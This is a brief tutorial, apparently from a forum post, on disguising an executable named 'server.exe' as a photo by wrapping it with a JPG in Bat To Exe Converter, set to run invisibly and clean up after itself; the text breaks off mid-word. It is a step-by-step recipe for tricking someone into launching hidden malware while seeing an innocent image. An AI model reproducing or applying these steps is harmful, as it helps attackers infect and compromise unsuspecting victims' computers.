Bat To Exe Converter v1.5
download it from google it is free and approximatly 421 kb
and process

make new folder and put your server.exe and photo.jpg

make a bat file with following code

call photo.jpg
call server.exe

now open Bat To Exe Converter v1.5

Batch file: browse and select your .bat
visiblity : invisible application
temporary file: delete and exit
working directory :temporary directory
now click on include tab click add and slect server.exe and photo.jpg
now click on compile you don
